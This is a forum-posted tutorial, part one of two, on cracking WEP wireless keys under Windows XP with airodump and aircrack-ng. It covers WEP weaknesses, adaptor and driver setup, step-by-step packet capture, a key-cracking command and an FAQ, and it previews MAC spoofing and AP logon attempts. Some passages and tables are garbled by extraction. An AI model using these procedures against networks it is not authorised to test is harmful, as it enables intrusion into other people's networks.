Académique Documents
Professionnel Documents
Culture Documents
This is part one in a two part paper on Cracking WEP with Windows XP. This first
part covers sniffing wireless traffic and obtaining the WEP key. Part Two will cover
associating with a Wireless AP, spoofing your MAC address, trying to log on
administratively to the AP and further things you can carry out on the WLAN once
authenticated successfully.
What is WEP:
Wired Equivalent Privacy (WEP) is often mistakenly thought of as a protocol designed to
100% protect wireless traffic, when this is not the case.
As its name suggests it was designed to give wireless traffic the same level of protection
as a wired LAN, which when you think about it is a very hard thing to set out to do.
LANs are inherently more secure than Wireless LANs (WLAN) due to physical and
geographical constraints. For an attacker to sniff data on a LAN they must have physical
access to it which is obviously easier to prevent than to prevent access to traffic on a
WLAN.
WEP works at the lower layers of the OSI model, layers One and Two to be exact, so it
therefore does not provide total end to end security for the data transmission.
WEP can provide a level of security between a Wireless Client and an Access Point or
using that particular AP will need the same WEP key hence all the resultant traffic will be
using the exact same WEP key as well.
The one not so obvious side-affect of this is when it comes to administering the network.
If you have 60 wireless clients all using the same WEP key, do you really want to go and
periodially change them all..it is easier to leave it as it is. I am guilty of doing this on a
network I used to administer a few years ago as I am sure others are who still use WEP.
Wireless Standards:
The Institute of Electrical and Electronic Engineers (IEEE) defined specifications for
wireless traffic back in 1997. The protocol they came up with is the 802.11 standard.
Nowadays 802.11 has many different implementations for wireless traffic. The most
common ones are:
1) 802.11 this specifies that the wireless traffic will use the 2.4GHz frequency band
utilizing either Frequency Hoping Spread Spectrum (FHSS) or Direct Sequence Spread
Spectrum (DSSS). The FHSS is a protocol whereby the traffic hops to pre-defined
frequencies and is commonly used to reduce the effects of noise or interference in the
transmission. DSSS is also a protocol used to reduce noise interference by combining the
signal with a higher data rate bit sequence (commonly called a chipping code) which
separates the data up in to a logical sequence and attaches a form of CRC to the packet
before transmitting.
2) 802.11a this provides data transmission in the 5GHz band at a rate of anything up to
54Mbps. Unlike the original 802.11 specification this uses Orthogonal Frequency
Division Multiplexing (OFDM) to encode the traffic instead of FHSS or DSSS. OFDM is
a method of transmitting digital data by splitting it up in to smaller chunks and
transmitting them at the same time but on different frequencies, which is why the data
transfer rate is quite good.
3) 802.11b came along in 1999 with the intention of allowing wireless functionality to
be similar to that provided by Ethernet. It transmits data in the 2.4GHz band at 11Mbps
using DSSS only. Is sometimes called Wi-Fi.
4) 802.11g this works in the 2.4 GHz band at a rate of 20Mbps or more and came along
in 2003. It uses OFDM like 802.11a and transmits data in a very similar way. However
unlike 802.11a it is backward compatible with 802.11b.
A point worth noting here is if you have an 802.11b Wireless Adaptor you will not be
able to receive 802.11g traffic. If you do want to get in to WEP cracking it is well worth
your while investing in a dual band card. I will talk about Wireless Adaptors more later
on.
How do we crack WEP:
Well cracking WEP is fairly easy to understand if you have followed what I explained
above. We briefly touched on IVs and WEP encryption and how they tie in together. To
put it very simply, if you can decipher the IV algorithm you can decrypt or extract the
WEP key.
As I stated before WEP very kindly transmits the IV in clear, so if we can run a
mathematical equation against it we can find and decipher the RC4 stream that encrypted
the whole packet in the first place.
The WEP key is the missing value [key] from this mathematical equation. Remember
the AP or the client has this key to use when decrypting the packet and is what we must
find by running a complicated algorithm against the encrypted packet.
If you think about it like this it may become clearer:
You have an algorithm that is produced by concatenating a randomly generated 24 bit IV
with your WEP Key You also have an RC4 Key stream - the two are then hashed
together to encrypt the packet.
The IV is the hub of the whole process as this is they only thing that has used your WEP
key. If we run a statistical anyalisis against the IV to try and decrypt the packet, we can
find the key used at the begining of the process.
When you try to decrypt them, every time you crack a piece of the algorithm the
corresponding plain text part of the packet is revealed, once the whole packet is
decrypted you know the algorithm used to encrypt that particular packet A crude way of
describing it but as simple as I can make it.
Any attacker can passively collect encrypted data, after a while due to the limitations
explained earlier; two IVs that are the same will be collected. If two packets with the
same IV are XORd, an XOR of the plain text data can be revealed. This XOR can then
be used to infer data about the contents of the data packets.
The more identical IVs collected the more plain text data can be revealed. Once all the
plain text of a data packet is known, it will also been known for all data packets using the
same IV.
So before any transmission occurs WEP combines the keystream with the payload using
an XOR process, which produces ciphertext (data that has been encrypted). WEP includes
the IV in clear in the first few bytes of the frame. The receiving AP / Client uses this IV
along with the shared secret key (Your WEP Key) to decrypt the payload of the frame.
XOR is a mathematical algorithm which I am not even going to attempt to explain. This
site explains it very well though:
http://mathworld.wolfram.com/XOR.html
So in short the more identical IVs we can get the more plain text data we can reveal
and the closer we get to obtaining the key used to encrypt the data in the first place.
As it is not pre-determined when we are going to receive identical IVs it is impossible to
say how many IVs need to be collected but more about that later.
Software Used:
For this attack I am going to use aircrack-ng for Windows which can be obtained from
here:
http://tinyshell.be/aircrackng/wiki/ind ... ircrack-ng
Whilst here download cygwin1.dll and paste it in to the same folder as Aircrack-ng.
There is a copy of cygwin1.dll included already but the one available from the tinyshell
site is a later version of it.
The peek.dll and peek5.sys files also need to be in the same directory as aircrack. They
are available here:
If you download Winaircrack - which is a GUI version of what I cover in this paper copy the peek.dll and peek5.sys files across to where you have aircrack stored. You will
get a peek driver not found message if you dont do this.
Once it has downloaded you have to option of pasting the directory path of it in to your
Command Prompt path so you can start the application straight from the command line
without having to CD to the correct directory.
For example I copied this in to my path: C:\Documents and
Settings\Nokia\Desktop\aircrack-ng-0.3-win\aircrack-ng-0.3-win\bin
In the bin folder is airodump and aircrack-ng so now I can just type airodump straight
in to the command prompt to run the application.
To add something to your path:
Right click My Computer > Properties > Advanced > Environment Variables > Under
System Variables highlight PATH > Edit > enter the directory path using a ; to separate it
from any existing entries.
You also need to go to Wild Packets to pick up a new driver for your card.
http://www.wildpackets.com/
I have found that the most common cause of stress when trying to crack WEP is
incompatible hardware. The Airopeek driver from Wild Packets is not compatible with all
types of hardware. There is a list of supported adaptors and the relevant driver you need
to use on the web site.
For this crack I am using an Atheros based NETGEAR WAG511 DUAL BAND adaptor
which you can get from HERE for 35.99.
This card works with Whax, Auditor and BackTrack pretty much straight out of the box.
It is also a dual band so you dont have to worry about sniffing traffic on a g WLAN
when you have a b wireless adaptor. It is my preferred Wireless Adaptor and has not let
me down yet.
Most cards that are Atheros based will have the Atheros logo on the side of the box, use
one of these if possible.
**Some people I know have confused the NETGEAR WG511 which does not work, with
the NETGEAR WG511T which does work so try not to fall in to this trap**
Cards that I can 100% say to stay away from are ones that use the PrisimGT chipset.
Connexant cards are also a complete waste of time (which I found out the hardway) so
please do not even think about buying one of these if you want to crack WEP.
See this list to check what chipset your card uses:
http://www.linux-wlan.org/docs/wlan_adapters.html.gz
So you should now have:
Aircrack-ng
Cygwin1.dll in the same directory as Aircrack
Peek.dll and Peek5.sys in the same directory as Aircrack
Relevant Drivers from Wild Packets for your Adaptor
Added aircrack-ng to your PATH
Got an Adaptor that works with all of the above!
So whats next?
Now we need to install the driver you have downloaded.
**Warning the next procedure will overwrite your existing Windows driver, so make
sure you have the disc or a backup of it before carrying on.**
The peek driver will not let you use your Wireless Adaptor in the conventional way. You
wont be able to associate to an AP with it or browse the internet etc.
99% of Windows drivers a designed to make your Wireless Adaptor reject any 802.11
traffic not destined for it. The Peek driver puts your Adaptor in to a promiscuous mode to
allow it to sniff all 802.11 traffic that is compatible with your adaptor.
To install the driver open up your Device Manager and right click on your wireless
adaptor > Update Driver > Install from a Specific Location > Dont Search, I will chose
the driver to install > Have Disk > Browse to where you have downloaded the driver >
Double Click.
Windows may display a prompt warning you that the driver is not digitally signed, if ths
happens click continue anyway.
Airodump
So open a command prompt and type Airodump or if you have not added it to your
PATH you will need to CD to the right directory.
A new window opens now which will search for all installed wireless adaptors, give it a
numerical signature and display the following:
Code: Select all
usage: airodump <nic index> <nic type> <channel(s)> <output
prefix> [ivs only flag]
Known network adapters:
14
22
->
-> 22
You are then prompted to enter the type of chipset of your card:
Code: Select all
Interface types:
'o' = HermesI/Realtek
'a' = Aironet/Atheros
->
-> a
Then you are asked what channel you would like it to sniff traffic on:
Code: Select all
->
The USA only uses up to channel 11 and Europe use up to channel 14. Channel 11 in the
UK is the most common one that wireless APs default to however, so I normally start off
with channel 11. If you want to scan all channels use the 0 option.
We shall use channel 11:
Code: Select all
Channel(s): 1 to 14, 0 = all
-> 11
Now you are asked what you would like to save your capture file as:
Code: Select all
(note: if you specify the same output prefix, airodump will resume
the capture session by appending data to the existing capture
file)
Output filename prefix
->
If you specify a file name that you have already used the resulting data will be added to
the file which is an excellent feature if it becomes apparent later on that you do not
have enough IVs as you wont have to start all over again!
Code: Select all
Output filename prefix
->WEP1
Now you are asked if you only want to save the IVs or all packets that are sniffed.
Code: Select all
(note: to save space and only store the captured WEP IVs, press
y.The resulting capture file will only be useful for WEP cracking)
->
As we know to crack a WEP key we only need IVs so we can select yes to this question.
The resultant file will be saved as an .IVS file.
Code: Select all
Only write WEP IVs (y/n)
-> y
So now we have told it everything it needs to know, lets see what happens:
Code: Select all
BSSID
00:09:5B:FD:C6:52
HOMEWIRELESS
00:30:F1:F5:A1:35
PWR
Beacons
# Data
CH
MB
ENC
10
11
54
OPN
60
359
1234
11
54
WEP
BSSID
STATION
00:09:5B:FD:C6:52
00:30:F1:F5:A1:35
00:09:5B:B6:1D:2A
00:09:5B:84:A6:DF
PWR
Packets
17
87
6
1793
ESSID
Stuart
ESSID
HOMEWIRELESS
Stuart
This is a very helpful feature of Airodump that informs us what we need to spoof our
MAC to when associating with the AP.
DATA:
As I mentioned before it is impossible to give an exact number of IVs that need to be
collected to crack a WEP key. The more we can get the more chance we have of cracking
the WEP key. From trial and error I have found that I can crack a 40 bit WEP key in a few
seconds with around 250,000 400,00 IVs. You may be able to do it with more IVs or
less IVs, it is different every time.
For a 104 bit WEP key you will need anything up to 2000000 IVs and maybe even more.
The fewest amount of IVs I have ever been able to use in one of my lessons for a 104 bit
crack is 710,325 and this took just 4 minutes 31 seconds to crack but in other lessons I
have had to collect in excess of 2 million.
This is where the very handy feature of Airodump amending to existing files is useful. If
you have collected 500,000 and run a 64 bit attack on the file but are unsuccessful,
simply start Airodump again and use the same file name, all the new IVs will be added to
the ones you already have, so you dont have to start from the beginning all over again!
So now sit there and wait for the amount of IVs that you decide on to be collected!
Aircrack-ng
So once you have decided you have enough IVs press CTL + C to end Airodump. I have
collected 413,994 IVs for this crack.
You will still have the white command prompt open so just type Aircrack-ng at the
prompt. (Or CD to it)
You will now get a list of usages for Aircrack that you can use.
Code: Select all
Common options:
-a
-e
-b
-q
-w
-c
-t
-d
-m
-n
-i
-f
-k
-x
-y
<start>
<maddr>
<nbits>
<index>
<fudge>
<korek>
:
:
:
:
:
:
:
:
:
:
As this paper is getting a bit long I will just cover the options we need to crack a WEP
key from a file. If you want to try the other options out..try them and see what you come
up with. The helpful descriptions provided speak for themselves really.
So we have collected 413,994 IVs which is not enough for a 104 bit WEP crack so we
will try a 40 bit WEP crack instead (we can always add IVs to the file later on if it does
not work)
So we issue the following command to Aircrack:
Code: Select all
C:\Docu~\nokia>aircrack-ng -n 64 WEP1.ivs
depth
0/ 4
3)
0/ 3
4)
0/ 1
0)
0/ 1
5)
0/ 1
9)
byte(vote)
A6( 68) 82(
40) EE(
20) E4(
15) 18(
5) 23(
22(
75) 52(
19) 43(
15) 5A(
13) 21(
8) 8A(
04(
76) 33(
8) 8B(
5) C8(
5) 47(
0) 62(
15) ED(
12) 58(
12) F0(
11) 29(
27) 0E(
15) 38(
15) B8(
13) E0(
90% of my students who come to me complaining they cant crack WEP and that
Aircrack does not work are failing because they do not have a compatible Wireless
Adaptor.
If you are giving the commands that I am giving here, or get an error message when
installing the driver I can almost guarantee you that your card is not compatible. It is
possible to flash the firmware of some Prisim2 Cards, this pages helps you do this:
http://tinyshell.be/aircrackng/wiki/ind ... 2_flashing
Cant receive DATA / IVs with Airodump:
To receive IVs from an AP there has to be a client associated with it that is sending /
receiving traffic. If you are not receiving IVs the most likely causes of this are that there
is no associated clients or you are too far away from the AP. As far as I know Aireplay
does not work with Windows so you will have to use a Packet Injection application of
your choosing. I will cover this in Part 2.
Finally, if you are just plain unlucky you may just not be able to crack the WEP with the
IVs you have. If this happens the only option is to start from the beginning again.
If you cant crack the 64 bit WEP collect more IVs and try doing it as a 104 bit WEP key.
My thanks go to Chris Divine, KoreK and all who helped him, for writing such a helpful
application and to Thomas d'Otreppe who I believe imported it on to Windows?
FAQ
The following FAQ has been put together from questions in this thread. Additionally the
following link was found by Moo and has proved very helpful:
http://www.wirelessdefence.org/Contents ... GINAL.html
Can we ask that you look through the FAQ in that link and this FAQ before you post
questions here, thanks
Q. I can't get the Wild Packet drivers to work for my xxxxx wireless card. After I install it
says the card will not work properly now?
A. You wont be able to connect to the internet / AP in the conventional way after you
install the Wild Packet drivers - these drivers place your card in a promiscuous mode to
enable you to receive traffic not destined for you.
If you fire Airodump up after installing the drivers it should work, if they have been
installed correctly. There are two versions of the drivers. If it does not work then either
the drivers either havent been installed properly, you have installed the wrong version, or
they are incompatible with your card.
After you have finished go to your device manager in your control panel and 'roll back'
the driver to revert back to the original one so you can get normal connectivity.
____________________________________________________________
Q. Can I have two different wireless cards installed, one for general internet surfing and
another with the Wild Packet drivers installed for penetration testing?
A. Yes, this is a good solution; I do it most of the time when I need internet connectivity
and a passive connection at the same time. If you have more than one PCMCIA slot on
your laptop use the same slot for each card - this will prevent you having to constantly
reinstall the relevant drivers!
____________________________________________________________
Q. When I load Airodump I get the following error "LoadLibrary(Peek.dll) failed, make
sure this file is present in the current directory." what does this mean?
A. You will need to get the peek.dll and peek5.sys files and put them in the same
directory as Aircrack.
The easiest way to get them is to go here:
http://tinyshell.be/aircrackng/wiki/ind ... itle=Links
and download Winaircrack - which is a GUI version of Aircrack - copy and paste peek.dll
and peek5.sys in to your directory.
You should have added cygwin1.dll, peek.dll and peek5.sys in to your directory before
starting Airodump/Aircrack
____________________________________________________________
Q. When a click on (airdecap-ng,arpforge-ng.....),they quick open and close?
A. Read all of the paper......specifically the part about adding them to your path once
you have done this double clicking on the wont work any more.
____________________________________________________________
Q. I have it running fine, but the IV collection is really slow, can I speed it up at all?
A. If the wireless network does not have many clients, then IV collection will be very
slow. If this is your own network open up a command prompt and type:
ping "ip address of AP" -l 65500 -t (Thats a small L not a |)
This will send a constant stream of ICMP packets 65500B big to the AP which should
generate a good stream of IV's. This will only work if you are already associated with the
AP and is for use to test YOUR OWN WEP KEY you cannot use it against somebody
elses AP until you have associated with it.
____________________________________________________________
Q. How do I use Packet Injection to speed up collection of IVs? / I cant seem to get
packet injection program xxxxxx to work properly, can you help?
A. Unfortunately Packet Injection is outside the scope of this tutorial and may be covered
in a future one. For the time being you will have to do some research on Google.
Enjoy.
Last edited by Harry on Thu Dec 14, 2006 11:28 pm, edited 9 times in total.
Drugs have taught an entire generation of kids the metric system..
TAZ's better half: http://www.theadminzone.com/
Harry
Site Admin
Posts: 6501
Joined: Sat Feb 11, 2006 10:44 pm
Location: Manchester UK :-)
YIM
Top
Harry
Site Admin
Posts: 6501
Joined: Sat Feb 11, 2006 10:44 pm
Location: Manchester UK :-)
YIM
Top
Harry
Site Admin
Posts: 6501
Joined: Sat Feb 11, 2006 10:44 pm
Location: Manchester UK :-)
YIM